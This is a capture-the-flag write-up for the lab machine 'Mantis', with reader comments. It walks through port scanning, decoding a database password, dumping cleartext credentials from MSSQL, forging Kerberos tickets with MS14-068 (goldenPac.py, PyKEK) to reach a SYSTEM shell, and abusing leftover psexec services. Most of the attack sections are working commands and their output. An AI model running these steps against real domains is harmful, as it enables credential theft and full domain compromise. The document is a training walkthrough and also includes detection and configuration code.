Mantis write-up by Alamot

Enumeration

Port scanning

We scan the full range of TCP ports using nmap:

$ sudo nmap -T4 -A -p- 10.10.10.52

PORT      STATE    SERVICE      VERSION
53/tcp    open     domain       Microsoft DNS 6.1.7601
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open     kerberos-sec Microsoft Windows Kerberos (server time: 2017-09-17 08:05:01Z)
135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
738/tcp   filtered unknown
1337/tcp  open     http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
1361/tcp  filtered linx
1433/tcp  open     ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2017-09-16T19:03:50
|_Not valid after:  2047-09-16T19:03:50
|_ssl-date: 2017-09-17T08:06:17+00:00; +2s from scanner time.
3268/tcp  open     ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3734/tcp  filtered synel-data
4461/tcp  filtered unknown
5722/tcp  open     msrpc        Microsoft Windows RPC
7511/tcp  filtered pafec-lm
8080/tcp  open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp  open     mc-nmf       .NET Message Framing
9484/tcp  filtered unknown
9725/tcp  filtered unknown
11126/tcp filtered unknown
11628/tcp filtered unknown
13100/tcp filtered unknown
13703/tcp filtered unknown
19797/tcp filtered unknown
29664/tcp filtered unknown
34288/tcp filtered unknown
35536/tcp filtered unknown
37108/tcp filtered unknown
47001/tcp open     http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open     msrpc        Microsoft Windows RPC
49153/tcp open     msrpc        Microsoft Windows RPC
49155/tcp open     msrpc        Microsoft Windows RPC
49156/tcp open     msrpc        Microsoft Windows RPC
49157/tcp open     ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc        Microsoft Windows RPC
49162/tcp open     msrpc        Microsoft Windows RPC
49289/tcp filtered unknown
50010/tcp open     msrpc        Microsoft Windows RPC
50017/tcp open     msrpc        Microsoft Windows RPC
50255/tcp open     unknown
53029/tcp filtered unknown
55718/tcp filtered unknown
56870/tcp filtered unknown
57167/tcp filtered unknown

No exact OS matches for host 

Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2017-09-17T04:06:21-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol

We scan only the 1000 most common UDP ports with nmap (a full UDP sweep is far too slow):

$ sudo nmap -T4 -sU -A --top-ports=1000 10.10.10.52

PORT      STATE         SERVICE        VERSION
9/udp     open|filtered discard
53/udp    open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/udp    open          kerberos-sec   Microsoft Windows Kerberos (server time: 2017-09-17 08:47:35Z)
123/udp   open          ntp            NTP v3
| ntp-info: 
|_  
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
389/udp   open          ldap           Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
464/udp   open|filtered kpasswd5
500/udp   open|filtered isakmp
4500/udp  open|filtered nat-t-ike
5355/udp  open|filtered llmnr
17146/udp open|filtered unknown
20359/udp open|filtered unknown
20742/udp open|filtered unknown
32771/udp open|filtered sometimes-rpc6
49198/udp open|filtered unknown
52144/udp open          domain         Zoom X5 ADSL modem DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52225/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
52503/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53006/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53037/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53571/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53589/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
53838/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54094/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54114/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54281/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
54321/udp open          domain         Microsoft DNS
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)

Too many fingerprints match this host to give specific OS details

Service Info: Host: MANTIS; OS: Windows; Device: broadband router; CPE: cpe:/o:microsoft:windows_server, cpe:/o:microsoft:windows, cpe:/h:zoom:x5

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

Brute forcing directories and files

$ dirsearch -u http://10.10.10.52:1337 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp

Extensions: asp | Threads: 10 | Wordlist size: 220521

Target: http://10.10.10.52:1337

[09:17:59] Starting: 
[09:18:00] 200 -  689B  - /
[09:30:17] 500 -    3KB - /orchard
[10:06:05] 301 -  160B  - /secure_notes  ->  http://10.10.10.52:1337/secure_notes/

$ dirsearch -u http://10.10.10.52:8080 -w /opt/DirBuster/directory-list-2.3-medium.txt -e asp

Target: http://10.10.10.52:8080

[10:14:28] Starting: 
[10:14:50] 200 -    6KB - /
[10:15:13] 200 -    3KB - /archive
[10:16:15] 200 -    3KB - /blogs
[10:17:07] 302 -  163B  - /admin  ->  /Users/Account/AccessDenied?ReturnUrl=%2Fadmin
[10:21:05] 200 -    2KB - /tags
[10:27:23] 200 -    3KB - /Archive
[10:32:18] 200 -    3KB - /pollArchive
[10:40:06] 200 -    3KB - /Blogs
[10:45:24] 200 -    3KB - /newsarchive
[10:54:36] 200 -    3KB - /news_archive
[11:18:17] 302 -  163B  - /Admin  ->  /Users/Account/AccessDenied?ReturnUrl=%2FAdmin

Let’s visit http://10.10.10.52:1337/secure_notes/

10.10.10.52 - /secure_notes/
[To Parent Directory]

 9/13/2017  4:22 PM          912 dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
  9/1/2017  9:13 AM          168 web.config

http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

The file name dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt carries what looks like a base64-encoded token (only base64 alphabet characters, and its length is a multiple of 4). Let's decode it:

$ echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

The result is 36 hex digits, i.e. 18 bytes. Let's convert it to ASCII:

$ echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

Bingo! We found what looks like an MSSQL password. The dev notes say a SQL user named "admin" was created, so let's test the password with that username.
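The two-step decode above (base64, then hex) generalizes: file names, cookies and config values often carry several encoding layers. The following Python is added here as an example and is not part of the original write-up. It pulls the token out of the file name and peels hex and base64 layers off until printable text remains. The heuristics are my own assumptions: hex is tried before base64 because every hex string is also valid base64, and a layer is accepted only if it decodes to printable ASCII. The file name is the one found in /secure_notes/.

```python
import base64
import binascii
import re

# The file name found under /secure_notes/ on the box (from the write-up).
DEV_NOTES_FILENAME = "dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt"

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def extract_token(filename):
    """Return the longest base64/hex-looking run in the file name's stem, or None.
    Heuristic (my assumption): a token is at least 16 chars of the base64 alphabet."""
    stem = filename.split(".")[0]
    candidates = re.findall(r"[A-Za-z0-9+/=]{16,}", stem)
    return max(candidates, key=len) if candidates else None


def _printable(text):
    return all(32 <= ord(ch) < 127 for ch in text)


def decode_layers(token, max_depth=5):
    """Peel hex and base64 layers off `token` until plain printable text remains.

    Returns (plaintext, layers) where layers lists the encodings removed, outermost
    first. Hex is tried before base64 because every hex string is also valid base64;
    a layer is only accepted if it decodes to printable ASCII, which stops the loop
    from mangling ordinary words that happen to be base64-shaped.
    """
    layers = []
    current = token
    for _ in range(max_depth):
        if HEX_RE.match(current) and len(current) % 2 == 0:
            try:
                decoded = binascii.unhexlify(current).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                break
            if not _printable(decoded):
                break
            layers.append("hex")
            current = decoded
            continue
        if BASE64_RE.match(current) and len(current) % 4 == 0:
            try:
                decoded = base64.b64decode(current, validate=True).decode("utf-8")
            except (binascii.Error, ValueError, UnicodeDecodeError):
                break
            if not _printable(decoded):
                break
            layers.append("base64")
            current = decoded
            continue
        break
    return current, layers


if __name__ == "__main__":
    token = extract_token(DEV_NOTES_FILENAME)
    plaintext, layers = decode_layers(token)
    print(f"{token} -> {plaintext}  (layers: {' > '.join(layers)})")
```

Run as-is it prints the MSSQL password with the layer order base64 > hex. The printable-ASCII gate is what keeps a plain word such as "password" (8 chars, base64-shaped) from being "decoded" into garbage.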

Exploring MSSQL databases

Using Impacket (mssqlclient.py)

$ mssqlclient.py -p 1433 admin:m\$\$ql_S@_P@ssW0rd\!@10.10.10.52
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> SELECT name FROM master.dbo.sysdatabases
master
tempdb
model
msdb
orcharddb

SQL> use orcharddb
SQL> SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%User%'
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_UserRolesPartRecord

SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord'
Id                                                                                                                    
UserName                                                                                                             
Email                                                                                                                
NormalizedUserName                                                                                                   
Password                                                                                                             
PasswordFormat                                                                                                       
HashAlgorithm                                                                                                        
PasswordSalt                                                                                                         
RegistrationStatus                                                                                                   
EmailStatus                                                                                                          
EmailChallengeToken                                                                                                  
CreatedUtc                                                                                                            
LastLoginUtc                                                                                                         
LastLogoutUtc 

SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord 
admin
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James
J@m3s_P@ssW0rd!

Using Metasploit

$ msfconsole
msf > use auxiliary/admin/mssql/mssql_findandsampledata
msf auxiliary(mssql_findandsampledata) > set USERNAME admin
msf auxiliary(mssql_findandsampledata) > set PASSWORD m$$ql_S@_P@ssW0rd!
msf auxiliary(mssql_findandsampledata) > set SAMPLE_SIZE 10

  Name                 Current Setting     Required  Description
  ----                 ---------------     --------  -----------
  KEYWORDS             passw|credit|card   yes       Keywords to search for
  PASSWORD             m$$ql_S@_P@ssW0rd!  no        The password for the specified username
  RHOSTS               10.10.10.52         yes       The target address range or CIDR identifier
  RPORT                1433                yes       The target port (TCP)
  SAMPLE_SIZE          10                  yes       Number of rows to sample
  TDSENCRYPTION        false               yes       Use TLS/SSL for TDS data "Force Encryption"
  THREADS              1                   yes       The number of concurrent threads
  USERNAME             admin               no        The username to authenticate as
  USE_WINDOWS_AUTHENT  false               yes       Use windows authentification (requires DOMAIN option set)

msf auxiliary(mssql_findandsampledata) > exploit

[*] 10.10.10.52:1433 - Attempting to connect to the SQL Server at 10.10.10.52:1433...
[*] 10.10.10.52:1433 - Successfully connected to 10.10.10.52:1433
[*] 10.10.10.52:1433 - Attempting to retrieve data ...
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, AL1337E2D6YHm0iIysVzG8LA76Oozg, 2                             
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., Password, nvarchar, J@m3s_P@ssW0rd!               , 2                             
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, NA                            , 2                             
[*] 10.10.10.52:1433 - MANTIS\\SQLEXPRESS, orcharddb, ..., PasswordSalt, nvarchar, UBwWF1CQCsaGc/P7jIR/kg==      , 2                             
[*] 10.10.10.52:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploiting Kerberos

We have found credentials (james:J@m3s_P@ssW0rd!) stored in cleartext in the orcharddb database. james is an ordinary domain user, but the domain controller is Windows Server 2008 R2, so let's try MS14-068, the Kerberos PAC validation flaw that lets any authenticated domain user forge a ticket claiming Domain Admin membership:

Using Impacket (goldenPac.py)

Add these lines to /etc/hosts

10.10.10.52 mantis.htb.local
10.10.10.52 htb.local

Now let’s run goldenPac.py:

$ goldenPac.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local

Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file hgjtJStu.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service rQic on mantis.htb.local.....
[*] Starting service rQic.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Using PyKEK i.e. Python Kerberos Exploitation Kit (ms14-068.py)

Add these lines to /etc/hosts

10.10.10.52 mantis.htb.local
10.10.10.52 htb.local

Add this line to /etc/resolv.conf

nameserver 10.10.10.52

Get USER_SID using rpcclient:

$ rpcclient -U james 10.10.10.52
Enter james's password: J@m3s_P@ssW0rd!
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103

Forge the TGT (the script prompts for james's password) and put it where the Kerberos libraries look for the default credential cache, /tmp/krb5cc_<uid> (alternatively, export KRB5CCNAME pointing at the file):

$ git clone https://github.com/bidord/pykek && cd pykek
$ python2 ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:J@m3s_P@ssW0rd!

$ cp TGT_james@htb.local.ccache /tmp/krb5cc_$UID

Connect using smbclient:

$ smbclient -k -U james \\\\mantis.htb.local\\C$

OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \> more \USERS\Administrator\DESKTOP\root.txt
209dc756ee5c09a9967540fe18d15567

A word of advice

If Kerberos does not work as expected, make sure that you have added the proper lines in /etc/hosts and /etc/resolv.conf (and, of course, check the Kerberos configuration files if you use them).

Notice also that Kerberos realm names are case-sensitive: a Windows domain's realm is its DNS name in UPPERCASE (HTB.LOCAL). With a lowercase realm, kinit requests a ticket for htb.local, the KDC answers for HTB.LOCAL, and kinit rejects the reply because the realm does not match what it asked for. Compare the two runs:

$ kinit -V james@htb.local
Using default cache: /tmp/krb5cc_1000
Using principal: james@htb.local
Password for james@htb.local: J@m3s_P@ssW0rd!
kinit: KDC reply did not match expectations while getting initial credentials

$ kinit -V james@HTB.LOCAL
Using default cache: /tmp/krb5cc_1000
Using principal: james@HTB.LOCAL
Password for james@HTB.LOCAL: J@m3s_P@ssW0rd!
Authenticated to Kerberos v5
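A minimal /etc/krb5.conf that matches this box, added here as an example and not taken from the original write-up: the realm is the upper-cased domain, the KDC is the domain controller, and the domain_realm section maps lowercase host names onto the uppercase realm so that tools given mantis.htb.local pick HTB.LOCAL automatically. The realm, host name and IP come from the write-up; the dns_lookup settings and the file layout are my assumptions. Because the KDC is named explicitly under [realms], this also avoids the "Cannot find KDC for realm" error when /etc/resolv.conf does not point at the DC (the /etc/hosts entries are still needed to resolve mantis.htb.local).

```ini
[libdefaults]
    default_realm = HTB.LOCAL
    # assumption: take the KDC from the [realms] block below, not from DNS SRV records
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    HTB.LOCAL = {
        kdc = mantis.htb.local
        admin_server = mantis.htb.local
    }

[domain_realm]
    .htb.local = HTB.LOCAL
    htb.local = HTB.LOCAL
```

With this in place kinit james@HTB.LOCAL and kinit james (the default realm is filled in) both work, and smbclient -k picks up the cache from /tmp/krb5cc_<uid> or from KRB5CCNAME.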

BONUS: Exploitation using left behind services

Look Mom! No need for kerberos exploit! :smiley:

$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file VdYFkBHZ.exe
[-] Error uploading file VdYFkBHZ.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

We got some errors, but it worked! Maybe we have access to a writable share after all…

$ smbmap.py -u james -p J@m3s_P@ssW0rd\! -H mantis.htb.local
[+] Finding open SMB ports....
[+] User SMB session establishd on mantis.htb.local...
[+] IP: mantis.htb.local:445	Name: mantis.htb.local                                  
    Disk                                                Permissions
    ----                                                -----------
    ADMIN$                                              NO ACCESS
    C$                                                  NO ACCESS
    IPC$                                                NO ACCESS
    NETLOGON                                            READ ONLY
    SYSVOL                                              READ ONLY

No. We don't have access to a writable share. This is very strange: how did we get an nt authority\system shell? I decided to open an issue on the Impacket GitHub to ask ("How is this possible? nt system shell without writable shares", fortra/impacket issue #346).

It turns out that psexec.py was connecting to a RemComSvc instance that an earlier run had left running on the target. The writable share is needed only to upload the RemComSvc service binary; once the service is running, psexec.py talks to it over SMB named pipes, which a plain domain user can reach even though no share is writable.

I changed the password for the administrator account to make it easier to explore the issue:

C:\Windows\system32> net user Administrator P@ssw0rd

We can use Impacket's services.py to list the services and look for the fingerprint psexec.py leaves behind: a service whose name is four random letters (uppercase here) and whose binary is eight random mixed-case letters with an .exe extension, sitting directly under C:\Windows\:

$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local list

...
IHXM -                                                                   IHXM -  RUNNING
...
TZZW -                                                                   TZZW -  RUNNING
...


$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Querying service config for IHXM
TYPE              : 16 -  SERVICE_WIN32_OWN_PROCESS  
START_TYPE        :  2 -  AUTO START
ERROR_CONTROL     :  0 -  IGNORE
BINARY_PATH_NAME  : C:\Windows\dZEyLGVN.exe
LOAD_ORDER_GROUP  : 
TAG               : 0
DISPLAY_NAME      : IHXM
DEPENDENCIES      : /

$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local config -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Querying service config for TZZW
TYPE              : 16 -  SERVICE_WIN32_OWN_PROCESS  
START_TYPE        :  2 -  AUTO START
ERROR_CONTROL     :  0 -  IGNORE
BINARY_PATH_NAME  : C:\Windows\EfuIvklz.exe
LOAD_ORDER_GROUP  : 
TAG               : 0
DISPLAY_NAME      : TZZW
DEPENDENCIES      : /
SERVICE_START_NAME: LocalSystem
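As an added example (not part of the write-up), here is how the fingerprint just described can be turned into a check that runs over captured services.py config output. The sample records are constructed: IHXM and TZZW reproduce the values shown on this page, while Dhcp and Spooler are made-up benign services with typical paths, included to show that the heuristic does not fire on an ordinary four-letter service name. The regular expressions and the two-indicator threshold are my choices.

```python
import re

# Constructed sample data shaped like `services.py ... config -name <svc>` output.
# IHXM and TZZW carry the values captured on Mantis in the write-up; Dhcp and Spooler
# are made-up benign entries (typical paths, not captured from the box) for contrast.
CONFIG_OUTPUTS = {
    "IHXM": r"""
TYPE              : 16 -  SERVICE_WIN32_OWN_PROCESS
START_TYPE        :  2 -  AUTO START
ERROR_CONTROL     :  0 -  IGNORE
BINARY_PATH_NAME  : C:\Windows\dZEyLGVN.exe
LOAD_ORDER_GROUP  :
TAG               : 0
DISPLAY_NAME      : IHXM
DEPENDENCIES      : /
""",
    "TZZW": r"""
TYPE              : 16 -  SERVICE_WIN32_OWN_PROCESS
START_TYPE        :  2 -  AUTO START
ERROR_CONTROL     :  0 -  IGNORE
BINARY_PATH_NAME  : C:\Windows\EfuIvklz.exe
LOAD_ORDER_GROUP  :
TAG               : 0
DISPLAY_NAME      : TZZW
DEPENDENCIES      : /
SERVICE_START_NAME: LocalSystem
""",
    "Dhcp": r"""
TYPE              : 32 -  SERVICE_WIN32_SHARE_PROCESS
START_TYPE        :  2 -  AUTO START
BINARY_PATH_NAME  : C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
DISPLAY_NAME      : DHCP Client
SERVICE_START_NAME: NT Authority\LocalService
""",
    "Spooler": r"""
TYPE              : 272 -  SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
START_TYPE        :  2 -  AUTO START
BINARY_PATH_NAME  : C:\Windows\System32\spoolsv.exe
DISPLAY_NAME      : Print Spooler
SERVICE_START_NAME: LocalSystem
""",
}

# psexec.py names its service with four random letters and drops an eight-letter
# randomly named .exe straight into the Windows directory (the page's examples:
# dZEyLGVN.exe, EfuIvklz.exe). goldenPac.py created "rQic", so match any case.
SERVICE_NAME_RE = re.compile(r"^[A-Za-z]{4}$")
BINARY_RE = re.compile(r"^[A-Za-z]:\\Windows\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def parse_config(text):
    """Turn `KEY : VALUE` lines into a dict; splits on the first colon only, so
    values such as C:\\Windows\\... keep their own colon."""
    cfg = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        cfg[key.strip()] = value.strip()
    return cfg


def suspicious_reasons(name, cfg):
    """List the psexec.py-leftover indicators a service matches."""
    reasons = []
    if SERVICE_NAME_RE.match(name):
        reasons.append("four-letter random-looking service name")
    if BINARY_RE.match(cfg.get("BINARY_PATH_NAME", "")):
        reasons.append("eight-letter random .exe directly under the Windows directory")
    if cfg.get("DISPLAY_NAME", "") in ("", name):
        reasons.append("display name empty or identical to the service name")
    return reasons


def find_leftover_remcom(configs):
    """Return {service: reasons} for services that look like abandoned RemComSvc
    installs. The binary-path match is strong enough on its own; otherwise require
    two indicators so that legitimate four-letter names (Dhcp) are not flagged."""
    flagged = {}
    for name, text in configs.items():
        cfg = parse_config(text)
        reasons = suspicious_reasons(name, cfg)
        if BINARY_RE.match(cfg.get("BINARY_PATH_NAME", "")) or len(reasons) >= 2:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for svc, why in find_leftover_remcom(CONFIG_OUTPUTS).items():
        print(f"{svc}: {'; '.join(why)}")
```

Run stand-alone it reports IHXM and TZZW with all three indicators and stays silent on Dhcp and Spooler. On a real engagement the same check belongs in the clean-up phase as well as in detection: an abandoned SYSTEM service reachable by any domain user is exactly what handed out the shell in the BONUS section.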

Now, let’s try to stop those two services and check if psexec still works as before:

$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name IHXM
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Stopping service IHXM

$ services.py htb.local/administrator:P@ssw0rd@mantis.htb.local stop -name TZZW
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...
[*] Stopping service TZZW

$ psexec.py htb.local/james:J@m3s_P@ssW0rd\!@mantis.htb.local
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Trying protocol 445/SMB...

[*] Requesting shares on mantis.htb.local.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
[*] Uploading file ysSjUyKc.exe
[-] Error uploading file ysSjUyKc.exe, aborting.....
[-] Error performing the installation, cleaning up: 'NoneType' object has no attribute 'split'

Yup, it doesn't work anymore. This confirms that those two services were responsible for the previous behaviour. But how were those services installed on the box in the first place? I don't know. Probably some pentester tried psexec.py during the testing phase and, when for any reason the tool's clean-up phase failed, it left those services behind. :slight_smile:

awesome !

great write-up!

That is an excellent write-up, I spent hours with KEK and smbclient struggling with the syntax. GoldenPac looks like it made that part easy :astonished:.

Funny, I've never managed to get goldenPac.py to work, although smbexec.py got me there... great WU, thanks

I'm having an issue with both smb and kinit. I get the error message "kinit: Cannot find KDC for realm 'HTB.LOCAL' while getting initial credentials". I've double, triple checked and I've made the right changes to both hosts and resolv.conf. Any help appreciated! The smb error I get is "SPNEGO: Could not find a suitable mechtype in NEG_TOKEN_INIT". Thanks

Is resolv.conf getting overwritten? It took me 2+ hrs and looking at Wireshark and -d 3 verbose in smbclient for me to get EVERYTHING right to work.

Sorry, I have a question.
How could we know james can log on to the server using psexec?
Thanks!

@ponder We didn’t know it. We found it by trying.

@alamot said:
@ponder We didn’t know it. We found it by trying.

Ohhhhh. Thank you so much.

Has anyone encountered this error in Impacket's mssqlclient?
[*] Encryption required, switching to TLS
[-] [('SSL routines', 'ssl_cipher_list_to_bytes', 'no ciphers available')]

I tried adding more ciphers within the tds.py code, but without success